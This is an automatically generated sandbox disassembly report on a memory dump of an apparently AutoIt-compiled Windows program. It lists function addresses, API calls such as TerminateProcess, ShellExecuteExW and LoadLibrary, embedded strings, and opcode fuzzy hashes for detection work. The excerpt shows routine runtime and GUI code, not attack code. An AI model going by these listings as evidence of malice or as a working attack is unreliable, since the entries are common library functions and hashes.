Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: bae1cc8b0d494c8a377990aa891811b0a727ba0ee2b3697555114d7406525dfc
Instruction ID: 388278151bae07f1bc6e5e2abba14f98612164c05add604de2df8d193cd22c92
Opcode Fuzzy Hash: bae1cc8b0d494c8a377990aa891811b0a727ba0ee2b3697555114d7406525dfc
Instruction Fuzzy Hash: 1B11677250020EABDF119FA8ED49FDF7BA9EF49704F148064FA09A2060C771CE64DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00233382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00233379,00232FE5), ref: 00233390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0023339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002333B7
SetLastError.KERNEL32(00000000,?,00233379,00232FE5), ref: 00233409

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9fe5a23cf3f745e9f61f3ea7343f514e9a363bfb76232bbd7a4899751966a148
Instruction ID: a6b31443b58a296083442d7a28645c5a2ad2994429c3be30107f5c269fa04ab5
Opcode Fuzzy Hash: 9fe5a23cf3f745e9f61f3ea7343f514e9a363bfb76232bbd7a4899751966a148
Instruction Fuzzy Hash: 3A012DB3639313BF96146B757C8A6665B54D705376F30C26AF510811F0EF114F319984

Uniqueness

Uniqueness Score: -1.00%

Function 00242D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00245686,00253CD6,?,00000000,?,00245B6A,?,?,?,?,?,0023E6D1,?,002D8A48), ref: 00242D78
_free.LIBCMT ref: 00242DAB
_free.LIBCMT ref: 00242DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0023E6D1,?,002D8A48,00000010,00214F4A,?,?,00000000,00253CD6), ref: 00242DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0023E6D1,?,002D8A48,00000010,00214F4A,?,?,00000000,00253CD6), ref: 00242DEC
_abort.LIBCMT ref: 00242DF2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 318224a6cc4db6072604c3b66ae150ce8e4e9ff15073a666333cb8d748772fd8
Instruction ID: 951b669a53583f5ba7d387ae140be83b549fa9feeb6242b96240c7d8052793f9
Opcode Fuzzy Hash: 318224a6cc4db6072604c3b66ae150ce8e4e9ff15073a666333cb8d748772fd8
Instruction Fuzzy Hash: B5F02831D35A02E7C61E7B37BC0EF1E2659AFC27A0FB40019F824922D2EE708C394520

Uniqueness

Uniqueness Score: -1.00%

Function 002751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00275218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00275229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00275230
ReleaseDC.USER32(00000000,00000000), ref: 00275238
MulDiv.KERNEL32 ref: 0027524F
MulDiv.KERNEL32 ref: 00275261

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: d282d970d9dc02bb11c9a723b44b928fdc55f5ba697863358364d9e94c60f811
Instruction ID: 39527d4af34b43e881b1bc5c563d3666a2db9664c6dfde65947d37c8cb123f4c
Opcode Fuzzy Hash: d282d970d9dc02bb11c9a723b44b928fdc55f5ba697863358364d9e94c60f811
Instruction Fuzzy Hash: A4014F75A00719BBEB109FA5AC49A5EBFB8EB49751F144065FA08A7281DA709C10CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00229639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00229693
Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296A2
Part of subcall function 00229639: BeginPath.GDI32(?), ref: 002296B9
Part of subcall function 00229639: SelectObject.GDI32(?,00000000), ref: 002296E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002A8A4E
LineTo.GDI32(?,00000003,00000000), ref: 002A8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002A8A70
LineTo.GDI32(?,00000000,00000003), ref: 002A8A80
EndPath.GDI32(?), ref: 002A8A90
StrokePath.GDI32(?), ref: 002A8AA0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 71a22250ce2edb11c8c5745c3b7e43bbb43b6ff6b5c49e1b3967e34943d0c78d
Instruction ID: d9c81490386d9b0ae1acd63e2b4c0b034912d06e71d5442674bb36c0a3a25c74
Opcode Fuzzy Hash: 71a22250ce2edb11c8c5745c3b7e43bbb43b6ff6b5c49e1b3967e34943d0c78d
Instruction Fuzzy Hash: 7E111B7604014DFFDF129F90EC88FAA7F6CEB09350F108022BA199A1A1CB719D65DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0027EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0027EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0027EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0027EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0027EB6E
CloseHandle.KERNEL32(00000000), ref: 0027EB75

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 1021fdf1c899ad3cae3760f738aebc8ad23dd025bfaba6270d4ac5d35484f339
Instruction ID: 66ebed7bf8db00c7a754de1734df4d1cbf77bf17f8b55dcbf2a4301666bfb470
Opcode Fuzzy Hash: 1021fdf1c899ad3cae3760f738aebc8ad23dd025bfaba6270d4ac5d35484f339
Instruction Fuzzy Hash: F8F01772240159BBE7219B62AC0EEAB3A7CEBCBF11F104159F601D1091EBA05A018AB5

Uniqueness

Uniqueness Score: -1.00%

Function 00267439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00267452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00267469
GetWindowDC.USER32(?), ref: 00267475
GetPixel.GDI32(00000000,?,?), ref: 00267484
ReleaseDC.USER32(?,00000000), ref: 00267496
GetSysColor.USER32 ref: 002674B0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 08374e017652260381f4667bac4a3eeba384091b4eb6df1fca7043cb2d25e952
Instruction ID: 3d62d56a7cec90b1a97e1c421cae362a3cb7ffe93a1bf30b97220ca22328c3d7
Opcode Fuzzy Hash: 08374e017652260381f4667bac4a3eeba384091b4eb6df1fca7043cb2d25e952
Instruction Fuzzy Hash: DC018B31410215EFDB109FA4ED0CBAA7BB5FB05711F600060F925A21A0CF311EA1AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00271874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0027187F
UnloadUserProfile.USERENV(?,?), ref: 0027188B
CloseHandle.KERNEL32(?), ref: 00271894
CloseHandle.KERNEL32(?), ref: 0027189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002718A5
HeapFree.KERNEL32(00000000), ref: 002718AC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: bfd01c299b00f6e5730d7b06c5cd92c7c052ef7e796c08cf3bb9358bbf581529
Instruction ID: 77f8c5649fa14b8ac2b2ac2bb7708e1640f030cf4a117ff97ca293baf48d6d91
Opcode Fuzzy Hash: bfd01c299b00f6e5730d7b06c5cd92c7c052ef7e796c08cf3bb9358bbf581529
Instruction Fuzzy Hash: 31E07576204505FBDB016FA5FD0C94ABF79FF4AB22B608625F22981471DF329461DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0027C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625

GetMenuItemInfoW.USER32 ref: 0027C6EE
_wcslen.LIBCMT ref: 0027C735
SetMenuItemInfoW.USER32 ref: 0027C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0027C7CA

Strings

0, xrefs: 0027C6AF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: d645256636f15c6dfa320cc9c055bdfcf8269d8c626f14e0e950b16ee9af6a52
Instruction ID: 1f84185c02c30a7a737104ea0a3470285c8a18ad0a775e0fb50202a27eda19a6
Opcode Fuzzy Hash: d645256636f15c6dfa320cc9c055bdfcf8269d8c626f14e0e950b16ee9af6a52
Instruction Fuzzy Hash: 1951E3716343029BD7199F38D885A6BB7E8AF85310F24892DF599E21D0DB70D9248F52

Uniqueness

Uniqueness Score: -1.00%

Function 0029AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0029AEA3

Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625

GetProcessId.KERNEL32(00000000), ref: 0029AF38
CloseHandle.KERNEL32(00000000), ref: 0029AF67

Strings

<, xrefs: 0029AE6B
@, xrefs: 0029AE72

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 4633c49bec2bd7431709f6aba9c155d6b64f9fff0dd943e1a5b16fd3cb235e98
Instruction ID: 8e7b802c29244f8e191dcf32c3cf6f51b9ee04e4dff9220a20bf5d7e3dadf40e
Opcode Fuzzy Hash: 4633c49bec2bd7431709f6aba9c155d6b64f9fff0dd943e1a5b16fd3cb235e98
Instruction Fuzzy Hash: D2715670A20219DFCF14DF54C484A9EBBF1BF08300F0484A9E856AB662CB71ED95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0027719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00277206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0027723C
GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 0027724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002772CF

Strings

DllGetClassObject, xrefs: 00277242

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: ac32ed0e29e5c56378de251611a60bd581fba6c6c6ef0c4d8af41e64176515ba
Instruction ID: 6c08833049ba8c21e88ee07045fd6c968261bb23998e81fc9a0c15410c8bf16c
Opcode Fuzzy Hash: ac32ed0e29e5c56378de251611a60bd581fba6c6c6ef0c4d8af41e64176515ba
Instruction Fuzzy Hash: 03418D71A14204EFDB15CF64C884A9A7BB9EF49314F24C0AABD19DF20AD7B0DD54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002A2F8D
LoadLibraryW.KERNEL32(?), ref: 002A2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002A2FA9
DestroyWindow.USER32 ref: 002A2FB1

Strings

SysAnimate32, xrefs: 002A2F68

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: f4a80fa04916e51a630ae662191fb156a79344a67430ae5cff73e5964de90351
Instruction ID: 07565d61ee2b9eac3470fd259fb16cf223d24d8dca55479a39b0b95325ea06d8
Opcode Fuzzy Hash: f4a80fa04916e51a630ae662191fb156a79344a67430ae5cff73e5964de90351
Instruction Fuzzy Hash: F721C071220206EFEB108F68DC84FBB77BDEB5A364F104219FA50D6590DB71DCA59B60

Uniqueness

Uniqueness Score: -1.00%

Function 00234D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00234D1E,002428E9,?,00234CBE,002428E9,002D88B8,0000000C,00234E15,002428E9,00000002), ref: 00234D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00234D1E,002428E9,?,00234CBE,002428E9,002D88B8,0000000C,00234E15,002428E9,00000002), ref: 00234DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00234D1E,002428E9,?,00234CBE,002428E9,002D88B8,0000000C,00234E15,002428E9,00000002,00000000), ref: 00234DC3

Strings

CorExitProcess, xrefs: 00234D98
mscoree.dll, xrefs: 00234D86

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: de5768fe9d34b553e971399e41c9595f8445795c97113bea4ea74b86930421a0
Instruction ID: 0d82e6ee1a378e4d4833de78121b2d748380378c6aaa60a931dbe714cf58d7e9
Opcode Fuzzy Hash: de5768fe9d34b553e971399e41c9595f8445795c97113bea4ea74b86930421a0
Instruction Fuzzy Hash: 92F03C74A50209ABDB159F94EC49BAEBFE5EB45752F1001A4E90AA2260CF70AE50DA90

Uniqueness

Uniqueness Score: -1.00%

Function 0026D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0026D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0026D3BF
FreeLibrary.KERNEL32(00000000), ref: 0026D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0026D3B9
X64, xrefs: 0026D2A8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: a62448563147c83bd3f4c591846612b7aed85799aa2f9399c0f214435f21015d
Instruction ID: be80f758d48cc9a2499ebecaa67f0be126d5b49c4853117ec23e784097c8b558
Opcode Fuzzy Hash: a62448563147c83bd3f4c591846612b7aed85799aa2f9399c0f214435f21015d
Instruction Fuzzy Hash: 74F05571F3962ADBD7711B219C3C9693724AF12701B6484E5F806EA216DFA0CDF08AD2

Uniqueness

Uniqueness Score: -1.00%

Function 00214E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EAE
FreeLibrary.KERNEL32(00000000,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EC0

Strings

kernel32.dll, xrefs: 00214E94
Wow64DisableWow64FsRedirection, xrefs: 00214EA8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: ebfe66d95d7ace7b2f328307fe4dedc6251bc78d52cf82462cab1da048a8286f
Instruction ID: ffb02e2dc5adf9df151f250b87a84d9edafb856afb7597974b977b124c2d2b18
Opcode Fuzzy Hash: ebfe66d95d7ace7b2f328307fe4dedc6251bc78d52cf82462cab1da048a8286f
Instruction Fuzzy Hash: D6E0CD35B115235BD2322F25BC1CB9F65D4AF93F627150115FC0CD2200DF60CD5144B1

Uniqueness

Uniqueness Score: -1.00%

Function 00214E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E74
FreeLibrary.KERNEL32(00000000,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E87

Strings

kernel32.dll, xrefs: 00214E5B
Wow64RevertWow64FsRedirection, xrefs: 00214E6E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
